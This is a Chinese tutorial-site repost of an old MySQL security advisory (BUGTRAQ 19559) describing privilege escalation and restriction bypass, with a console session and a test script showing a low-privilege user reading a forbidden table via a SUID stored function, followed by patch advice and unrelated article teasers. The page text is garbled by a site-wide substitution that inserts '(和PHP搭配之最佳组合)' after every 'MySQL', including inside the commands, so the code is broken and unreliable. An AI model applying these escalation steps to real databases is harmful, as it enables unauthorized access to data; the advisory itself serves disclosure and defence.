MySQL权限提升与安全限制问题探讨-mysql教程-PHP中文網

首頁

資料庫

mysql教程

MySQL权限提升与安全限制问题探讨

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 07, 2016 pm 04:13 PM

mysql安全探討提升文章權限問題限制

以下的文章主要讲述的是MySQL权限提升与安全限制绕过漏洞的实际应用，我前几天在相关网站看见MySQL权限提升与安全限制绕过漏洞的实际应用的资料，觉得挺好，今天就拿出来供大家分享。受影响系统： MySQL(和PHP搭配之最佳组合) AB MySQL(和PHP搭配之最佳组合

以下的文章主要讲述的是MySQL权限提升与安全限制绕过漏洞的实际应用，我前几天在相关网站看见MySQL权限提升与安全限制绕过漏洞的实际应用的资料，觉得挺好，今天就拿出来供大家分享。

受影响系统：

MySQL(和PHP搭配之最佳组合) AB MySQL(和PHP搭配之最佳组合)

描述：

BUGTRAQ ID: 19559

MySQL(和PHP搭配之最佳组合)是一款使用非常广泛的开放源代码关系数据库系统，拥有各种平台的运行版本。

在MySQL(和PHP搭配之最佳组合)上，拥有访问权限但无创建权限的用户可以创建与所访问数据库仅有名称字母大小写区别的新数据库。成功利用这个漏洞要求运行MySQL(和PHP搭配之最佳组合)的文件系统支持区分大小写的文件名。

此外，由于在错误的安全环境中计算了suid例程的参数，攻击者可以通过存储的例程以例程定义者的权限执行任意DML语句。成功攻击要求用户对所存储例程拥有EXECUTE权限。

测试方法：

【警告：以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！】

1、创建数据库

<ol class="dp-xml">
<li class="alt"><span><span>$ MySQL(和PHP搭配之最佳组合) -h my.MySQL(和PHP搭配之最佳组合).server -u sample -p -A sample  </span></span></li>
<li><span>Enter password:   </span></li>
<li class="alt"><span>Welcome to the MySQL(和PHP搭配之最佳组合) monitor. Commands end with ; or \g.  </span></li>
<li><span>Your MySQL(和PHP搭配之最佳组合) connection id is 263935 to server version: 4.1.16-standard  </span></li>
<li class="alt">
<span>MySQL(和PHP搭配之最佳组合)</span><span class="tag">></span><span> create database another;  </span>
</li>
<li><span>ERROR 1044: Access denied for user 'sample'@'%' to database 'another'  </span></li>
<li class="alt">
<span>MySQL(和PHP搭配之最佳组合)</span><span class="tag">></span><span> create database sAmple;   </span>
</li>
<li><span>Query OK, 1 row affected (0.00 sec)  </span></li>
</ol>

2、权限提升

<ol class="dp-xml">
<li class="alt"><span><span>--disable_warnings  </span></span></li>
<li><span>drop database if exists MySQL(和PHP搭配之最佳组合)test1;  </span></li>
<li class="alt"><span>drop database if exists MySQL(和PHP搭配之最佳组合)test2;  </span></li>
<li><span>drop function if exists f_suid;  </span></li>
<li class="alt"><span>--enable_warnings  </span></li>
<li><span># Prepare playground  </span></li>
<li class="alt"><span>create database MySQL(和PHP搭配之最佳组合)test1;  </span></li>
<li><span>create database MySQL(和PHP搭配之最佳组合)test2;  </span></li>
<li class="alt"><span>create user malory@localhost;  </span></li>
<li><span>grant all privileges on MySQL(和PHP搭配之最佳组合)test1.* to malory@localhost;  </span></li>
<li class="alt"><span># Create harmless (but SUID!) function  </span></li>
<li><span>create function f_suid(i int) returns int return 0;  </span></li>
<li class="alt"><span>grant execute on function test.f_suid to malory@localhost;  </span></li>
<li><span>use MySQL(和PHP搭配之最佳组合)test2;  </span></li>
<li class="alt"><span># Create table in which malory@localhost will be interested but to which  </span></li>
<li><span># he won't have any access  </span></li>
<li class="alt"><span>create table t1 (i int);  </span></li>
<li><span>connect (malcon, localhost, malory,,MySQL(和PHP搭配之最佳组合)test1);  </span></li>
<li class="alt"><span># Correct malory@localhost don't have access to MySQL(和PHP搭配之最佳组合)test2.t1  </span></li>
<li><span>--error ER_TABLEACCESS_DENIED_ERROR  </span></li>
<li class="alt"><span>select * from MySQL(和PHP搭配之最佳组合)test2.t1;  </span></li>
<li><span># Create function which will allow to exploit security hole  </span></li>
<li class="alt"><span>delimiter |;  </span></li>
<li><span>create function f_evil ()  </span></li>
<li class="alt"><span>returns int  </span></li>
<li><span>sql security invoker  </span></li>
<li class="alt"><span>begin  </span></li>
<li>
<span>set @</span><span class="attribute">a:</span><span>= </span><span class="attribute-value">current_user</span><span>();  </span>
</li>
<li class="alt">
<span>set @</span><span class="attribute">b:</span><span>= (select count(*) from MySQL(和PHP搭配之最佳组合)test2.t1);  </span>
</li>
<li><span>return 0;  </span></li>
<li class="alt"><span>end|  </span></li>
<li><span>delimiter ;|  </span></li>
<li class="alt"><span># Again correct  </span></li>
<li><span>--error ER_TABLEACCESS_DENIED_ERROR  </span></li>
<li class="alt"><span>select f_evil();  </span></li>
<li><span>select @a, @b;  </span></li>
<li class="alt"><span># Oops!!! it seems that f_evil() is executed in the context of  </span></li>
<li><span># f_suid() definer, so malory@locahost gets all info that he wants  </span></li>
<li class="alt"><span>select test.f_suid(f_evil());  </span></li>
<li><span>select @a, @b;  </span></li>
<li class="alt"><span>connection default;  </span></li>
<li><span>drop user malory@localhost;  </span></li>
<li class="alt"><span>drop database MySQL(和PHP搭配之最佳组合)test1;  </span></li>
<li><span>drop database MySQL(和PHP搭配之最佳组合)test2;  </span></li>
</ol>

建议：

厂商补丁：MySQL(和PHP搭配之最佳组合) AB，目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载。

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

解釋酸的特性（原子，一致性，隔離，耐用性）。Apr 16, 2025 am 12:20 AM

ACID屬性包括原子性、一致性、隔離性和持久性，是數據庫設計的基石。 1.原子性確保事務要么完全成功，要么完全失敗。 2.一致性保證數據庫在事務前後保持一致狀態。 3.隔離性確保事務之間互不干擾。 4.持久性確保事務提交後數據永久保存。

MySQL：數據庫管理系統與編程語言Apr 16, 2025 am 12:19 AM

MySQL既是數據庫管理系統（DBMS），也與編程語言緊密相關。 1）作為DBMS，MySQL用於存儲、組織和檢索數據，優化索引可提高查詢性能。 2）通過SQL與編程語言結合，嵌入在如Python中，使用ORM工具如SQLAlchemy可簡化操作。 3）性能優化包括索引、查詢、緩存、分庫分錶和事務管理。

mySQL：使用SQL命令管理數據Apr 16, 2025 am 12:19 AM

MySQL使用SQL命令管理數據。 1.基本命令包括SELECT、INSERT、UPDATE和DELETE。 2.高級用法涉及JOIN、子查詢和聚合函數。 3.常見錯誤有語法、邏輯和性能問題。 4.優化技巧包括使用索引、避免SELECT*和使用LIMIT。

MySQL的目的：有效存儲和管理數據Apr 16, 2025 am 12:16 AM

MySQL是一種高效的關係型數據庫管理系統，適用於存儲和管理數據。其優勢包括高性能查詢、靈活的事務處理和豐富的數據類型。實際應用中，MySQL常用於電商平台、社交網絡和內容管理系統，但需注意性能優化、數據安全和擴展性。

SQL和MySQL：了解關係Apr 16, 2025 am 12:14 AM

SQL和MySQL的關係是標準語言與具體實現的關係。 1.SQL是用於管理和操作關係數據庫的標準語言，允許進行數據的增、刪、改、查。 2.MySQL是一個具體的數據庫管理系統，使用SQL作為其操作語言，並提供高效的數據存儲和管理。

說明InnoDB重做日誌和撤消日誌的作用。Apr 15, 2025 am 12:16 AM

InnoDB使用redologs和undologs確保數據一致性和可靠性。 1.redologs記錄數據頁修改，確保崩潰恢復和事務持久性。 2.undologs記錄數據原始值，支持事務回滾和MVCC。

在解釋輸出（類型，鍵，行，額外）中要查找的關鍵指標是什麼？Apr 15, 2025 am 12:15 AM

EXPLAIN命令的關鍵指標包括type、key、rows和Extra。 1）type反映查詢的訪問類型，值越高效率越高，如const優於ALL。 2）key顯示使用的索引，NULL表示無索引。 3）rows預估掃描行數，影響查詢性能。 4）Extra提供額外信息，如Usingfilesort提示需要優化。

在解釋中使用臨時狀態以及如何避免它是什麼？Apr 15, 2025 am 12:14 AM

Usingtemporary在MySQL查詢中表示需要創建臨時表，常見於使用DISTINCT、GROUPBY或非索引列的ORDERBY。可以通過優化索引和重寫查詢避免其出現，提升查詢性能。具體來說，Usingtemporary出現在EXPLAIN輸出中時，意味著MySQL需要創建臨時表來處理查詢。這通常發生在以下情況：1)使用DISTINCT或GROUPBY時進行去重或分組；2)ORDERBY包含非索引列時進行排序；3)使用複雜的子查詢或聯接操作。優化方法包括：1)為ORDERBY和GROUPB

See all articles